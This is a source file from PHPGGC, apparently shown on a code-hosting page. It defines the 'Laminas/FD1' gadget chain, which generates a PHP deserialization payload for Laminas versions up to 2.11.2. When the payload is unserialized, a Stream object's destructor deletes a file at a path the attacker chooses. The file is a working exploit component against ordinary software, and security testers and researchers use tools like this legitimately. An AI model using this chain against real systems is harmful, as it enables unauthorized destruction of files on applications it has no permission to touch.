Codebase list phpggc / 0ab3c3cf-9fb4-4819-9693-c53227701ce6/upstream gadgetchains / Laminas / FD / 1 / chain.php
0ab3c3cf-9fb4-4819-9693-c53227701ce6/upstream

Tree @0ab3c3cf-9fb4-4819-9693-c53227701ce6/upstream (Download .tar.gz)

chain.php @0ab3c3cf-9fb4-4819-9693-c53227701ce6/upstreamraw · history · blame

<?php

namespace GadgetChain\Laminas;

class FD1 extends \PHPGGC\GadgetChain\FileDelete
{
    public static $version = '<= 2.11.2';
    public static $vector = '__destruct';
    public static $author = 'MrTuxracer';

    public function generate(array $parameters)
    {
        $remote_path = $parameters["remote_path"];

        return new \Laminas\Http\Response\Stream($remote_path);
    }
}